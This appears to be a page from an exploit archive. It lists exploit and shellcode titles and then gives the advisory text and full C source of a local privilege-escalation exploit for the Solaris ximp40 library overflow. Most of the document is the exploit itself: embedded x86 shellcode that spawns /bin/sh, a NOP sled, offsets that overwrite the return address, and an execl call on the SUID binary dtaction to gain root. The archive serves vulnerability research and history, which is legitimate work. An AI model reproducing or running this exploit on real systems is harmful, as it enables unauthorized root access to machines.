
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
97 lines
No EOL
3.4 KiB
C
97 lines
No EOL
3.4 KiB
C
// source: https://www.securityfocus.com/bid/2322/info
|
|
|
|
Solaris is a variant of the UNIX Operating System, maintained and distributed by Sun Microsystems. It is freely available, with source code available.
|
|
|
|
A problem in the ximp40 library packaged with Openwin could allow a user to gain elevated privileges. Due to a problem with the handling of input by the programs linked against ximp40.so.2, it is possible to supply a long string, approximately 272 bytes, to the arg0 of the command, which will overwrite stack variables, including the return address of the program.
|
|
|
|
This makes it possible for a malicious user with local access to the system to execute arbitrary code, and depending upon which SUID binary is exploited, gain either EUID mail, or EUID root. Programs linked against the library that have been reported as vulnerable are:
|
|
|
|
*Solaris 8
|
|
suid root : /usr/dt/bin/dtaction
|
|
suid root : /usr/dt/bin/dtprintinfo
|
|
suid root : /usr/openwin/bin/sys-suspend
|
|
sgid mail : /usr/dt/bin/dtmail
|
|
sgid mail : /usr/openwin/bin/mailtool
|
|
|
|
*Solaris 7
|
|
suid root : /usr/dt/bin/dtaction
|
|
suid root : /usr/dt/bin/dtprintinfo
|
|
suid root : /usr/dt/bin/dtappgather
|
|
suid root : /usr/bin/admintool
|
|
suid root : /usr/openwin/bin/sys-suspend
|
|
sgid mail : /usr/dt/bin/dtmail
|
|
sgid mail : /usr/openwin/bin/mailtool
|
|
|
|
/*====================================================================
|
|
Solaris ximp40 shared library exploit for Solaris8 Intel Edition
|
|
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
|
|
Written by UNYUN (shadowpenguin@backsection.net)
|
|
[usage]
|
|
#xhost +targethost
|
|
#telnet targethost
|
|
...
|
|
%setenv DISPLAY yourhost:0.0
|
|
%gcc ximp40.c
|
|
%./a.out
|
|
0:Default value 1:Calculated value > 1 <- Input 0 or 1
|
|
====================================================================
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
|
|
#define BUF_SIZE 272
|
|
#define EIP_OFFSET 260
|
|
#define FAKE_OFFSET 264
|
|
#define FAKE_VALUE 0x08046dec
|
|
#define EIP_VALUE 0x08047cb4
|
|
#define FAKE_VALUE_DIF 0xd9c
|
|
#define EIP_VALUE_DIF 0x12c
|
|
#define NOP 0x90
|
|
|
|
char shell_code[]=
|
|
"\xeb\x3b\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xc1"
|
|
"\x88\x46\xc6\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x17\xe8\xdf"
|
|
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89"
|
|
"\x5e\x08\x53\xb0\x3b\xe8\xc8\xff\xff\xff\x83\xc4\x0c\xe8\xc8\xff"
|
|
"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff"
|
|
"\xff\xff";
|
|
|
|
unsigned long get_sp(void)
|
|
{
|
|
__asm__(" movl %esp,%eax ");
|
|
}
|
|
|
|
void valset(char *p,unsigned int val)
|
|
{
|
|
*p=val&0xff;
|
|
*(p+1)=(val>>8)&0xff;
|
|
*(p+2)=(val>>16)&0xff;
|
|
*(p+3)=(val>>24)&0xff;
|
|
}
|
|
|
|
main()
|
|
{
|
|
char buf[BUF_SIZE];
|
|
unsigned int esp=get_sp(),sw;
|
|
|
|
memset(buf,NOP,BUF_SIZE);
|
|
memcpy(buf+EIP_OFFSET-strlen(shell_code),shell_code,
|
|
strlen(shell_code));
|
|
|
|
printf("esp=%x\n",esp);
|
|
printf("0:Default value 1:Calculated value >");
|
|
fflush(stdout);
|
|
scanf("%d",&sw);
|
|
if (sw==0){
|
|
valset(buf+FAKE_OFFSET, FAKE_VALUE);
|
|
valset(buf+EIP_OFFSET , EIP_VALUE);
|
|
printf("Jumping address = %x\n",EIP_VALUE);
|
|
}else{
|
|
valset(buf+FAKE_OFFSET, esp-FAKE_VALUE_DIF);
|
|
valset(buf+EIP_OFFSET , esp+EIP_VALUE_DIF);
|
|
printf("Jumping address = %x\n",esp+EIP_VALUE_DIF);
|
|
}
|
|
buf[BUF_SIZE-1]=0;
|
|
|
|
execl("/usr/dt/bin/dtaction",buf,NULL);
|
|
} |